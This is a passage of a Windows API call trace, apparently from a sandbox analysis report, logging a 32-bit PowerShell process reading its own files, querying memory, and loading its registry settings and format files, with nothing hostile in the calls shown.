lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.507] GetLastError () returned 0x0 [0043.508] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.508] GetLastError () returned 0x0 [0043.508] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.508] GetLastError () returned 0x0 [0043.508] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.508] GetLastError () returned 0x0 [0043.508] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.508] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.511] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.511] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.511] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.511] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.511] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.511] GetLastError () returned 0x0 [0043.511] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.512] GetLastError () returned 0x0 [0043.512] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.512] GetLastError () returned 0x0 [0043.512] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1b4, lpOverlapped=0x0) returned 1 [0043.512] GetLastError () returned 0x0 [0043.512] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x0, lpOverlapped=0x0) returned 1 [0043.512] GetLastError () returned 0x0 [0043.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dff4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0043.512] GetLastError () returned 0x0 [0043.512] SetErrorMode (uMode=0x1) returned 0x1 [0043.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cb62a8 | out: lpFileInformation=0x2cb62a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0043.512] GetLastError () returned 0x0 [0043.512] SetErrorMode (uMode=0x1) returned 0x1 [0043.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0043.512] GetLastError () returned 0x0 [0043.512] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e418 | out: phkResult=0x25e418*=0x348) returned 0x0 [0043.512] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e460, lpData=0x0, lpcbData=0x25e45c*=0x0 | out: lpType=0x25e460*=0x1, lpData=0x0, lpcbData=0x25e45c*=0x56) returned 0x0 [0043.513] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e460, lpData=0x54e2a0, lpcbData=0x25e45c*=0x56 | out: lpType=0x25e460*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e45c*=0x56) returned 0x0 [0043.513] RegCloseKey (hKey=0x348) returned 0x0 [0043.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0043.513] GetLastError () returned 0x0 [0043.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0043.513] GetLastError () returned 0x0 [0043.755] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.759] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.761] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.762] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.762] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.762] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.763] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.766] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.775] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.775] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.775] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.776] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.776] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.776] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.777] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.777] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.783] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.784] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.785] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.785] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.786] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.786] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.787] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.787] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.788] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.789] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.789] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.789] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.789] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.789] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.791] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.792] VirtualQuery (in: lpAddress=0x25d358, lpBuffer=0x25e358, dwLength=0x1c | out: lpBuffer=0x25e358*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.792] VirtualQuery (in: lpAddress=0x25d358, lpBuffer=0x25e358, dwLength=0x1c | out: lpBuffer=0x25e358*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.792] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.793] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.933] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.933] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.934] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.958] GetLastError () returned 0xcb [0043.964] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.969] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.969] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.969] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.970] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.970] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.970] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.972] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.972] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.973] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e4dc | out: phkResult=0x25e4dc*=0x344) returned 0x0 [0043.973] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x25e544, lpData=0x0, lpcbData=0x25e540*=0x0 | out: lpType=0x25e544*=0x1, lpData=0x0, lpcbData=0x25e540*=0x74) returned 0x0 [0043.973] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x25e524, lpData=0x0, lpcbData=0x25e520*=0x0 | out: lpType=0x25e524*=0x1, lpData=0x0, lpcbData=0x25e520*=0x74) returned 0x0 [0043.974] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x25e524, lpData=0x54e2a0, lpcbData=0x25e520*=0x74 | out: lpType=0x25e524*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x25e520*=0x74) returned 0x0 [0043.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x25e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0043.974] GetLastError () returned 0xcb [0043.974] SetErrorMode (uMode=0x1) returned 0x1 [0043.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x25e524 | out: lpFileInformation=0x25e524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0043.974] GetLastError () returned 0xcb [0043.974] SetErrorMode (uMode=0x1) returned 0x1 [0043.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0043.974] GetLastError () returned 0xcb [0043.974] SetErrorMode (uMode=0x1) returned 0x1 [0043.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0043.975] GetLastError () returned 0xcb [0043.975] SetErrorMode (uMode=0x1) returned 0x1 [0043.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0043.975] GetLastError () returned 0xcb [0043.975] SetErrorMode (uMode=0x1) returned 0x1 [0043.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0043.976] GetLastError () returned 0xcb [0043.976] SetErrorMode (uMode=0x1) returned 0x1 [0043.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0043.976] GetLastError () returned 0xcb [0043.976] SetErrorMode (uMode=0x1) returned 0x1 [0043.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e518 | out: lpFileInformation=0x25e518*(dwFileAttributes=0x20, 